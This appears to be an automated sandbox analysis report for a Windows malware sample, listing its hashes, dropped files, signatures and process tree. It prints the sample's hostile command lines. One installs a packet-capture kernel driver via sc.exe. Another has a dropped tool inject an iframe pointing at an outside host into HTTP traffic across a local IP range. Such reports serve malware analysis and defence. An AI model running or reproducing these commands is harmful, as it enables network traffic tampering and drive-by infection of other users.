Analysis
-
max time kernel
92s -
max time network
116s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
15-04-2024 23:19
Static task
static1
Behavioral task
behavioral1
Sample
f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
Resource
win10v2004-20240412-en
General
-
Target
f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
-
Size
179KB
-
MD5
f2278e965052d96535a62992e3ad6074
-
SHA1
55652fbaba6ec36cc4efe88e15ae07b091a8f195
-
SHA256
4232acfb5cb648aa98112472224380310428eb47d553e2c3beb538f42e49e215
-
SHA512
437736cf0561cbb4411a97684b32b149269d6a6872fabec80d2def06d1527bb3fbd898240c44a1f2a153ccac3e821e95a0667b3643d5d5364a72626f89fdacf6
-
SSDEEP
3072:B+Txy/bdnPJU0FEH2rjIYiWtK4h4URUSzYxfd1UQ0YKZVwlTylrDWIeqHa4OAb8C:g0RnP5EUj7iWM84UmSzwfd1wYKSqHz7p
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 1244 chdkk.exe -
Loads dropped DLL 6 IoCs
pid Process 1244 chdkk.exe 1244 chdkk.exe 1244 chdkk.exe 1244 chdkk.exe 1244 chdkk.exe 1244 chdkk.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\WanPacket.dll f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe File created C:\Windows\SysWOW64\Packet.dll f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe File created C:\Windows\SysWOW64\npptools.dll f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe File created C:\Windows\SysWOW64\chdkk.exe f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3588 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4348 wrote to memory of 3588 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 89 PID 4348 wrote to memory of 3588 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 89 PID 4348 wrote to memory of 3588 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 89 PID 4348 wrote to memory of 1244 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 91 PID 4348 wrote to memory of 1244 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 91 PID 4348 wrote to memory of 1244 4348 f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand2⤵
- Launches sc.exe
PID:3588
-
-
C:\Windows\SysWOW64\chdkk.exe"C:\Windows\system32\chdkk.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<iframe src=http://ww.xnibi.com/index.gif width=10 height=1></iframe>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1244
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
13KB
MD5ca42539e85a7f9bb372da8124f7a3254
SHA194ada2eaf210d3669b9d6873a5463eda6207a12a
SHA2561a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f
SHA5124e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09
-
Filesize
48KB
MD538e7f4e56118d91df929dba40035c017
SHA1a6fe6350e19622fd60561547a6a6882bdc52bfb7
SHA256281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361
SHA512c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6